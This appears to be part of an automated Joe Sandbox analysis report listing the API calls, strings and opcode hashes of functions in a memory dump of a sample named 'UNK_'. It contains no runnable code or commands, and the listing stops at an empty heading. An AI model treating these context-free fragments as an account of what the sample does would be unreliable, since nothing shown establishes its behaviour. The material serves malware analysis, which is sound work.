                                                                                                                  • IsMenu.USER32(?), ref: 00DD9D35
                                                                                                                  • CreatePopupMenu.USER32 ref: 00DD9D3F
                                                                                                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00DD9D70
                                                                                                                  • DrawMenuBar.USER32 ref: 00DD9D7E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                                                                  • String ID: 0
                                                                                                                  • API String ID: 176399719-4108050209
                                                                                                                  • Opcode ID: 5f70dbad450a90c581428bede387454472f281a87926d1489a222f87d3ea60a9
                                                                                                                  • Instruction ID: aa2e44aba6f28a834bc71de22678cd7c9d0084b17d9ebceab29a11c53116cbf5
                                                                                                                  • Opcode Fuzzy Hash: 5f70dbad450a90c581428bede387454472f281a87926d1489a222f87d3ea60a9
                                                                                                                  • Instruction Fuzzy Hash: B2416879A00209EFDB24EF68D894BEABBB6FF49304F184029E945A7351D731A914CF60
                                                                                                                  APIs
                                                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 00DBEC1E
                                                                                                                  • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00DBEC94
                                                                                                                  • GetLastError.KERNEL32 ref: 00DBEC9E
                                                                                                                  • SetErrorMode.KERNEL32(00000000,READY), ref: 00DBED0B
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                  • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                  • API String ID: 4194297153-14809454
                                                                                                                  • Opcode ID: 309ca5d1d747c977d1a75811dfc8fd20dc67145c1572c8dc4bd772ca7135ac68
                                                                                                                  • Instruction ID: 5c4c512b0376d35854b2b0e129fab7744703696d759bdec6b45d8ed9c7fa184b
                                                                                                                  • Opcode Fuzzy Hash: 309ca5d1d747c977d1a75811dfc8fd20dc67145c1572c8dc4bd772ca7135ac68
                                                                                                                  • Instruction Fuzzy Hash: A331D035A00309EFC711EF69C849AEEBBB5EF44700F188016E506EB291EA71DA41CBB1
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D7CAEE: _memmove.LIBCMT ref: 00D7CB2F
                                                                                                                  • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00DAC782
                                                                                                                  • GetDlgCtrlID.USER32 ref: 00DAC78D
                                                                                                                  • GetParent.USER32 ref: 00DAC7A9
                                                                                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 00DAC7AC
                                                                                                                  • GetDlgCtrlID.USER32(?), ref: 00DAC7B5
                                                                                                                  • GetParent.USER32(?), ref: 00DAC7D1
                                                                                                                  • SendMessageW.USER32(00000000,?,?,00000111), ref: 00DAC7D4
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$CtrlParent$_memmove
                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                  • API String ID: 313823418-1403004172
                                                                                                                  • Opcode ID: 804a2e6f28a95db0bea97f22b69c1b1dc7c77a2e6b7ccd49d649acf109a57abf
                                                                                                                  • Instruction ID: 9c2d29595513e8cd708a4ec67f04f842f727e1cc0705b0fcd6b8c36dcc97022b
                                                                                                                  • Opcode Fuzzy Hash: 804a2e6f28a95db0bea97f22b69c1b1dc7c77a2e6b7ccd49d649acf109a57abf
                                                                                                                  • Instruction Fuzzy Hash: 1D21C174A00208BFCF05EB64CC86EBEB766EB46310F108115F562D72D1DB749815EB30
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D7CAEE: _memmove.LIBCMT ref: 00D7CB2F
                                                                                                                  • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00DAC869
                                                                                                                  • GetDlgCtrlID.USER32 ref: 00DAC874
                                                                                                                  • GetParent.USER32 ref: 00DAC890
                                                                                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 00DAC893
                                                                                                                  • GetDlgCtrlID.USER32(?), ref: 00DAC89C
                                                                                                                  • GetParent.USER32(?), ref: 00DAC8B8
                                                                                                                  • SendMessageW.USER32(00000000,?,?,00000111), ref: 00DAC8BB
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$CtrlParent$_memmove
                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                  • API String ID: 313823418-1403004172
                                                                                                                  • Opcode ID: 832350fb69ed02bf616eba98afba96c09a25b800de853df5c3beb4c3c87acb6d
                                                                                                                  • Instruction ID: 6569841d497a5c9b81ddf61b260872ad909b0cea79aba9b19b08faa8b5986dd5
                                                                                                                  • Opcode Fuzzy Hash: 832350fb69ed02bf616eba98afba96c09a25b800de853df5c3beb4c3c87acb6d
                                                                                                                  • Instruction Fuzzy Hash: 1721AF71A00208BFDF01ABA4CC86EBEBBBAEF46311F148115F551E7291DB789815EB30
                                                                                                                  APIs
                                                                                                                  • GetParent.USER32 ref: 00DAC8D9
                                                                                                                  • GetClassNameW.USER32(00000000,?,00000100), ref: 00DAC8EE
                                                                                                                  • _wcscmp.LIBCMT ref: 00DAC900
                                                                                                                  • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00DAC97B
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: ClassMessageNameParentSend_wcscmp
                                                                                                                  • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                  • API String ID: 1704125052-3381328864
                                                                                                                  • Opcode ID: a718c58335bcd74b943795f0d9b8bd014a0e1c1f371964dd0448ede266b1d5ff
                                                                                                                  • Instruction ID: bb417ad933d5286170255a9af8510d505e6b98c4616eb40d4543fa613f619d93
                                                                                                                  • Opcode Fuzzy Hash: a718c58335bcd74b943795f0d9b8bd014a0e1c1f371964dd0448ede266b1d5ff
                                                                                                                  • Instruction Fuzzy Hash: 9711C67B658317B9FF142A34AC0ADA7779DDB07775B201016FA00F90D2FBA1A9118974
                                                                                                                  APIs
                                                                                                                  • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 00DBB137
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: ArraySafeVartype
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1725837607-0
                                                                                                                  • Opcode ID: 6fa41c2dbe520140eed4dc15d19835c2c6684ab84df8c84fe436ee35c89fdd75
                                                                                                                  • Instruction ID: b44648d2f36f482d1788479fd0a854a2e14232d00430c3b45f04e8fff00f18ad
                                                                                                                  • Opcode Fuzzy Hash: 6fa41c2dbe520140eed4dc15d19835c2c6684ab84df8c84fe436ee35c89fdd75
                                                                                                                  • Instruction Fuzzy Hash: A9C15875A0021ADFDB00DF98C481BEEB7F4EF09325F24406AE646E7341C7B0A941CBA0
                                                                                                                  APIs
                                                                                                                  • __lock.LIBCMT ref: 00D9BA74
                                                                                                                    • Part of subcall function 00D98984: __mtinitlocknum.LIBCMT ref: 00D98996
                                                                                                                    • Part of subcall function 00D98984: RtlEnterCriticalSection.NTDLL(00D90127), ref: 00D989AF
                                                                                                                  • __calloc_crt.LIBCMT ref: 00D9BA85
                                                                                                                    • Part of subcall function 00D97616: __calloc_impl.LIBCMT ref: 00D97625
                                                                                                                    • Part of subcall function 00D97616: Sleep.KERNEL32(00000000,?,00D90127,?,00D7125D,00000058,?,?), ref: 00D9763C
                                                                                                                  • @_EH4_CallFilterFunc@8.LIBCMT ref: 00D9BAA0
                                                                                                                  • GetStartupInfoW.KERNEL32(?,00E26990,00000064,00D96B14,00E267D8,00000014), ref: 00D9BAF9
                                                                                                                  • __calloc_crt.LIBCMT ref: 00D9BB44
                                                                                                                  • GetFileType.KERNEL32(00000001), ref: 00D9BB8B
                                                                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 00D9BBC4
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1426640281-0
                                                                                                                  • Opcode ID: d20603999a6fa9a6c98b19ecb51bdc6fb4ebc68698d0cd86f5059825488315b4
                                                                                                                  • Instruction ID: a707c3879fce5509ae7ebaf86f35be57c55205fbd1de0841501027b5bdb977e7
                                                                                                                  • Opcode Fuzzy Hash: d20603999a6fa9a6c98b19ecb51bdc6fb4ebc68698d0cd86f5059825488315b4
                                                                                                                  • Instruction Fuzzy Hash: FC81A2709057458FDF14CF68E9846A9BBF0EF45334B29825ED4A6AB3D1CB349802CB75
                                                                                                                  APIs
                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00DB4A7D
                                                                                                                  • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00DB3AD7,?,00000001), ref: 00DB4A91
                                                                                                                  • GetWindowThreadProcessId.USER32(00000000), ref: 00DB4A98
                                                                                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00DB3AD7,?,00000001), ref: 00DB4AA7
                                                                                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 00DB4AB9
                                                                                                                  • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00DB3AD7,?,00000001), ref: 00DB4AD2
                                                                                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00DB3AD7,?,00000001), ref: 00DB4AE4
                                                                                                                  • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00DB3AD7,?,00000001), ref: 00DB4B29
                                                                                                                  • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00DB3AD7,?,00000001), ref: 00DB4B3E
                                                                                                                  • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00DB3AD7,?,00000001), ref: 00DB4B49
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2156557900-0
                                                                                                                  • Opcode ID: 3050b14fa933d0ccab05a500232fc102eb161fdf6f6ed1fd80301202ff769afd
                                                                                                                  • Instruction ID: 9122b98096c3f998a2b17f7bf1ed9a7a301cde7d1e13bbb2d00ae18839ff6b05
                                                                                                                  • Opcode Fuzzy Hash: 3050b14fa933d0ccab05a500232fc102eb161fdf6f6ed1fd80301202ff769afd
                                                                                                                  • Instruction Fuzzy Hash: 35318471600308EFDB10DB66DC88FBA7BAAAB51712F188005FA06D7251D7B4EE44CB74
                                                                                                                  APIs
                                                                                                                  • GetClientRect.USER32(?), ref: 00DEEC32
                                                                                                                  • SendMessageW.USER32(?,00001328,00000000,?), ref: 00DEEC49
                                                                                                                  • GetWindowDC.USER32(?), ref: 00DEEC55
                                                                                                                  • GetPixel.GDI32(00000000,?,?), ref: 00DEEC64
                                                                                                                  • ReleaseDC.USER32(?,00000000), ref: 00DEEC76
                                                                                                                  • GetSysColor.USER32(00000005), ref: 00DEEC94
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 272304278-0
                                                                                                                  • Opcode ID: 4ff7dd18428bb5af6f64bc9c0e43263e2487448ea57b80a99d5647744bedfadb
                                                                                                                  • Instruction ID: d30108b90573c45134fd84fa340e90171200744a2140308ecf876bfaf8e8f427
                                                                                                                  • Opcode Fuzzy Hash: 4ff7dd18428bb5af6f64bc9c0e43263e2487448ea57b80a99d5647744bedfadb
                                                                                                                  • Instruction Fuzzy Hash: 7D214A31500345AFDB21AB64EC48BA97B67EB05321F248225FA26E92E1CB314A41DF31
                                                                                                                  APIs
                                                                                                                  • EnumChildWindows.USER32(?,00DADD46), ref: 00DADC86
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: ChildEnumWindows
                                                                                                                  • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                  • API String ID: 3555792229-1603158881
                                                                                                                  • Opcode ID: 9920e3e717a7cb69d0081455910ae94c2377fc4c31f92eecdf5b6624fe02f6b8
                                                                                                                  • Instruction ID: 22478f591713592571297b1e06ce4bf6972dfd3934fd3dd577a159a4c1575eeb
                                                                                                                  • Opcode Fuzzy Hash: 9920e3e717a7cb69d0081455910ae94c2377fc4c31f92eecdf5b6624fe02f6b8
                                                                                                                  • Instruction Fuzzy Hash: F091B570900606EACB08EF64C481BEDFB76FF1A310F588519D89BA7591DF70A959CBB0
                                                                                                                  APIs
                                                                                                                  • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00D745F0
                                                                                                                  • CoUninitialize.COMBASE ref: 00D74695
                                                                                                                  • UnregisterHotKey.USER32(?), ref: 00D747BD
                                                                                                                  • DestroyWindow.USER32(?), ref: 00DE5936
                                                                                                                  • FreeLibrary.KERNEL32(?), ref: 00DE599D
                                                                                                                  • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00DE59CA
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                  • String ID: close all
                                                                                                                  • API String ID: 469580280-3243417748
                                                                                                                  • Opcode ID: 7402e337cb6fcdc2492c7c1a0c93a890dd7d0d0f0ddd975fbf168dca337ff10a
                                                                                                                  • Instruction ID: cbf463c70fedcb48a286f110d0116deaf43fbe90c00e46eb31693aa107df8065
                                                                                                                  • Opcode Fuzzy Hash: 7402e337cb6fcdc2492c7c1a0c93a890dd7d0d0f0ddd975fbf168dca337ff10a
                                                                                                                  • Instruction Fuzzy Hash: FB912E34600642CFC71AEF14D895BA9F3A4FF15704F5482A9E40EA7262EB30AD66CF74
                                                                                                                  APIs
                                                                                                                  • SetWindowLongW.USER32(?,000000EB), ref: 00D8C2D2
                                                                                                                    • Part of subcall function 00D8C697: GetClientRect.USER32(?,?), ref: 00D8C6C0
                                                                                                                    • Part of subcall function 00D8C697: GetWindowRect.USER32(?,?), ref: 00D8C701
                                                                                                                    • Part of subcall function 00D8C697: ScreenToClient.USER32(?,?), ref: 00D8C729
                                                                                                                  • GetDC.USER32 ref: 00DEE006
                                                                                                                  • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00DEE019
                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00DEE027
                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00DEE03C
                                                                                                                  • ReleaseDC.USER32(?,00000000), ref: 00DEE044
                                                                                                                  • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00DEE0CF
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                  • String ID: U
                                                                                                                  • API String ID: 4009187628-3372436214
                                                                                                                  • Opcode ID: 214f1b8753146ecd2f5d1edb11b754edddf38a36efecbfac6a36edcbdf511366
                                                                                                                  • Instruction ID: b749e5a8d352154b3ca8f6084a08b49621f07867cd7b3c1ec6aa99ce3221973b
                                                                                                                  • Opcode Fuzzy Hash: 214f1b8753146ecd2f5d1edb11b754edddf38a36efecbfac6a36edcbdf511366
                                                                                                                  • Instruction Fuzzy Hash: 7D71E331400288DFCF21EF65C884ABA7BB6FF49320F184269ED559A2A5C731CC41DB70
                                                                                                                  APIs
                                                                                                                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00DC4C5E
                                                                                                                  • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00DC4C8A
                                                                                                                  • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00DC4CCC
                                                                                                                  • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00DC4CE1
                                                                                                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00DC4CEE
                                                                                                                  • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00DC4D1E
                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00DC4D65
                                                                                                                    • Part of subcall function 00DC56A9: GetLastError.KERNEL32(?,?,00DC4A2B,00000000,00000000,00000001), ref: 00DC56BE
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1241431887-3916222277
                                                                                                                  • Opcode ID: 97b4c11d46b6125b85bb64f16488faed5b90c4836072edbfb5367f39f57d8787
                                                                                                                  • Instruction ID: 48135305869397aa46c8103de7a564c8bf65ebbef04035c0d881460de26fda99
                                                                                                                  • Opcode Fuzzy Hash: 97b4c11d46b6125b85bb64f16488faed5b90c4836072edbfb5367f39f57d8787
                                                                                                                  • Instruction Fuzzy Hash: 2D417CB1501619BFEB12AF60DD95FFA77ADEF08314F14811AFA029B191D7B099448BB0
                                                                                                                  APIs
                                                                                                                  • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00E0DBF0), ref: 00DCBBA1
                                                                                                                  • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00E0DBF0), ref: 00DCBBD5
                                                                                                                  • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00DCBD33
                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 00DCBD5D
                                                                                                                  • StringFromGUID2.COMBASE(?,?,00000028), ref: 00DCBEAD
                                                                                                                  • ProgIDFromCLSID.COMBASE(?,?), ref: 00DCBEF7
                                                                                                                  • CoTaskMemFree.COMBASE(?), ref: 00DCBF14
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Free$FromString$FileLibraryModuleNamePathProgQueryTaskType
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 793797124-0
                                                                                                                  • Opcode ID: e81e5bc2520876bb6814d95fdd3d7286e14f495030f2aaebe7e15da177a18138
                                                                                                                  • Instruction ID: 82340a834af1a3ee0ef15042f4b463bbc3423d55f3ab9ddd86327b2d83f47859
                                                                                                                  • Opcode Fuzzy Hash: e81e5bc2520876bb6814d95fdd3d7286e14f495030f2aaebe7e15da177a18138
                                                                                                                  • Instruction Fuzzy Hash: 77F10B7590020AEFCB14DFA4C885EAEB7BAFF89715F148459F906AB250DB31ED41CB60
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D749CA: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00D74954,00000000), ref: 00D74A23
                                                                                                                  • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00D8B85B), ref: 00D8B926
                                                                                                                  • KillTimer.USER32(00000000,?,00000000,?,?,?,?,00D8B85B,00000000,?,?,00D8AF1E,?,?), ref: 00D8B9BD
                                                                                                                  • DestroyAcceleratorTable.USER32(00000000), ref: 00DEE775
                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00DEE7EB
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Destroy$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2402799130-0
                                                                                                                  • Opcode ID: 7579b709acd7f2242898e3b028e1d41ab42f081c67469a6ec9a7b2b583740e27
                                                                                                                  • Instruction ID: c62c94751e64be40fc5e2d61ff91b3413a8c013b6f085935bbacec40608c3ea6
                                                                                                                  • Opcode Fuzzy Hash: 7579b709acd7f2242898e3b028e1d41ab42f081c67469a6ec9a7b2b583740e27
                                                                                                                  • Instruction Fuzzy Hash: FA618930100705DFDB2ABF26D888B35BBF6FB85322F18451EE18696660C770E884DF64
                                                                                                                  APIs
                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00DDB204
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InvalidateRect
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 634782764-0
                                                                                                                  • Opcode ID: 03bad6ea362d57cd440660e97f0f641879a76d9bd0faac1909c3101373ce738b
                                                                                                                  • Instruction ID: 9032453eb3ce36dbdbff4a7c978a64b5a63c7591da055a0f855d375884f841b4
                                                                                                                  • Opcode Fuzzy Hash: 03bad6ea362d57cd440660e97f0f641879a76d9bd0faac1909c3101373ce738b
                                                                                                                  • Instruction Fuzzy Hash: 13518F31500308FEEB24AF298C89BAE3B65EB06338F254117F955E63A1DB71E950DB74
                                                                                                                  APIs
                                                                                                                  • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00DEE9EA
                                                                                                                  • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00DEEA0B
                                                                                                                  • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00DEEA20
                                                                                                                  • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00DEEA3D
                                                                                                                  • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00DEEA64
                                                                                                                  • DestroyCursor.USER32(00000000), ref: 00DEEA6F
                                                                                                                  • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00DEEA8C
                                                                                                                  • DestroyCursor.USER32(00000000), ref: 00DEEA97
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: CursorDestroyExtractIconImageLoadMessageSend
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3992029641-0
                                                                                                                  APIs
